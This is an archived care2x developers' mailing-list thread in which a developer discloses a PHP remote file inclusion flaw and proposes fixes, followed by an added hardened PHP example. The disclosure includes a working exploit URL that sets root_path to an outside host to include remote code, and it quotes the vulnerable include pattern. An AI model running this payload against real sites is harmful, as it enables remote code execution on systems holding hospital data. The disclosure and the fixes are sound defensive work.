Hi Robert,

thanks a lot for this very important information.

Elpidio


On 1/30/07, Robert Meggle <[EMAIL PROTECTED]> wrote:

Hello developers,

We found a security flaw that makes it possible to misuse our
care2x. Try this out:
http://<URL>/include/inc_environment_global.php?root_path=http://see-your-ip.info/cmd.do?

(just pass the root_path variable as GET to the script).
Inside of inc_environment_global.php there is just one line like
       require($root_path."whatever");      // or
       require_once($root_path."whatever"); // or
       include($root_path."whatever");

When you have enabled the PHP setting allow_url_fopen=Yes, then the
foreign site will be included (from the remote place).

1. It is strictly forbidden to expect that critical variables like
root_path will be included by the calling script and available in the
included files. There must always be a fresh include of roots.php.
Seems to fix it...
2. Try to prevent this kind of include file from accepting GET or POST
variables by adding at the top:
       if (isset($_GET['root_path']) || isset($_POST['root_path'])) die();
-> In this case the script will be stopped when somebody tries to pass
root_path via GET or POST variables. Seems to fix it...
3. You can also set the PHP setting allow_url_fopen to "no". Seems to
fix it...

I made a workaround like I described above.
In most cases of that project it is no problem. But exactly here, in the
include folder, the main idea is that the root_path variable is set by the
calling script (like index.php) and the included file (like
include/inc_environment_global.php) will use it (without reloading it from
the file roots.php).



Robert


--------------------------------------------
MEROTECH IT Engineering

Robert Meggle
Hohnerstrasse 6
89079 Ulm

-------------------------------------------------------------------------
_______________________________________________
Care2002-developers mailing list
Care2002-developers@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/care2002-developers
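The following is an added example, not care2x code and not part of either mail above: a hardened counterpart to the include pattern Robert quotes, combining his fix 1 (derive root_path locally instead of trusting the caller) with fix 2 (stop if the request tries to supply it). It assumes the file lives in include/ and that roots.php sits one directory above it; the path layout and the function name is_local_root_path are assumptions.

```php
<?php
// Added example (not care2x code). Assumed layout: this file is in
// include/, roots.php is one level up. Adjust for your tree.

// 1. Never take root_path from the request, whatever register_globals,
//    GET, POST or cookies deliver. Derive it from this file's own location.
$root_path = dirname(dirname(__FILE__)) . DIRECTORY_SEPARATOR;

// 2. Refuse anything that is not a plain local directory.
function is_local_root_path($path)
{
    // A scheme prefix (http:, https:, ftp:, php:, data:, ...) would turn the
    // include into a remote or wrapper include. The "+" requires at least
    // two scheme characters, so a Windows drive letter like "C:" still passes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $path)) {
        return false;
    }
    // Null bytes and parent traversal are never valid in a root path.
    if (strpos($path, "\0") !== false || strpos($path, '..') !== false) {
        return false;
    }
    return is_dir($path);
}

// 3. Stop if the client tried to override the path (the mail's fix 2,
//    extended to cookies, which register_globals also imports), or if the
//    derived path fails the check above.
if (isset($_GET['root_path']) || isset($_POST['root_path'])
    || isset($_COOKIE['root_path']) || !is_local_root_path($root_path)) {
    header('HTTP/1.0 403 Forbidden');
    exit('root_path may not be supplied by the client');
}

// 4. Only now include: the path is fixed and local, so the value of
//    allow_url_fopen no longer matters for this file.
require_once($root_path . 'roots.php');
```

The scheme check is the part worth keeping even after allow_url_fopen is disabled, because php:// and data: wrappers are governed by allow_url_include rather than allow_url_fopen.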
